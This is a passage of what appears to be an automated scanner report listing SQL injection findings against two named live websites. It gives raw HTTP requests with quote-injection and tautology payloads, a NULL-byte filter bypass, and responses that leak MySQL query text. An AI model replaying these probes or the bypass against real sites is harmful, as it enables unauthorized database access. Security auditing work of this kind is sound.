The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 1

HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 388
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /xml/jasmin/get/110325-1413/prefix+qx-backbutton+hosting-en+econda-tracking/js-min/AC:default HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:3:AAABLtTqPcIGXNiTx7DqY*rGgOUb2psf:1300652244418:0:false:10; __PFIX_TST_=4f6d1cc610415400; UT=zY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDowNmZvNSgpJSUjKiYoICAgHR0=

Response 2

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 00:24:37 GMT
Server: Apache
Expires: Sat, 26 Mar 2011 00:34:37 GMT
Cache-Control: max-age=600
Cache-Control: private
Content-Type: text/javascript;charset=utf-8
Content-Length: 302658

if(typeof UNOUNO=="undefined"){var UNOUNO={};}if(typeof UNOUNO.namespace=="undefined"){UNOUNO.namespace=function(){var a=arguments,o=null,i,j,d;for(i=0;i<a.length;++i){d=a[i].split(".");o=UNOUNO;for(j
...[SNIP]...

1.5. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow'/hins00/leadfl' at line 5

Request 2

GET /ppc/leadflow''/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.6. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00'/leadfl' at line 5

Request 2

GET /ppc/leadflow/hins00''/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:48 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.7. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow'/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow'/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow''/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.8. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00'/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00'/project.php?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00''/project.php?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.9. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php'?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php'?catId=' OR 'ns'='ns&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=' OR 'ns'='ns&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflo' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php''?catId='+OR+'ns'%3d'ns&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.10. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [catId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns'&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns'&iusrc=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns''&iusrc=3 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.0 404 Not Found
Date: Fri, 25 Mar 2011 19:16:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00/leadflow/hins00/project.php was not found on this server.</p>

1.11. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [iusrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
